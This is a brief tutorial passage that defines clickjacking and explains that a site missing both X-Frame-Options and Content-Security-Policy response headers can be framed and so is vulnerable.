Clickjacking
Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website
Exploitation
Clickjacking attacks are possible whenever websites can be framed. We can determine whether or not a website can be framed from its response header.
Website can be framed If neither X-Frame-Options nor Content-Security-Policy header is used.
We will examine the response header.
As you can see, there was neither X-Frame-Options nor Content-Security-Policy in the response header, which means the site can be framed and so it’s vulnerable to clickjacking.